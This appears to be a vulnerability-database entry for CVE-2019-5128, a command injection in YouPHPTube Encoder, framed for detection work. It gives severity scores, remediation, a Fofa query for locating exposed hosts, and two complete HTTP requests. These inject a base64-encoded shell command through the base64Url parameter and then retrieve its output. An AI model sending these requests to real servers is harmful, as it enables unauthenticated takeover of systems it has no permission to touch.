🔙 목록으로 돌아가기

CVE-2019-5128: YouPHPTube Encoder - Arbitrary File Write

TitleYouPHPTube Encoder - Arbitrary File Write
Authorpussycat0x
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary system commands through command injection, leading to complete server compromise and potential access to all media content.
RemediationUpgrade to YouPHPTube Encoder version 2.4 or later, or apply vendor-provided security patches.
CVSS Score9.8
EPSS Score0.92845
CVE IDCVE-2019-5128
CWE IDCWE-78
Fofa Queryicon_hash="-276846707"
Tags cve cve2019 youphptube intrusive encoder vkev vuln

🔍 Vulnerability Description

Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.

🌐 HTTP Request

GET /objects/getImageMP4.php?base64Url=YGlkID4ga0x3SC50eHRg&format=jpg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/604.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
GET /objects/kLwH.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-5128.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-5128.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A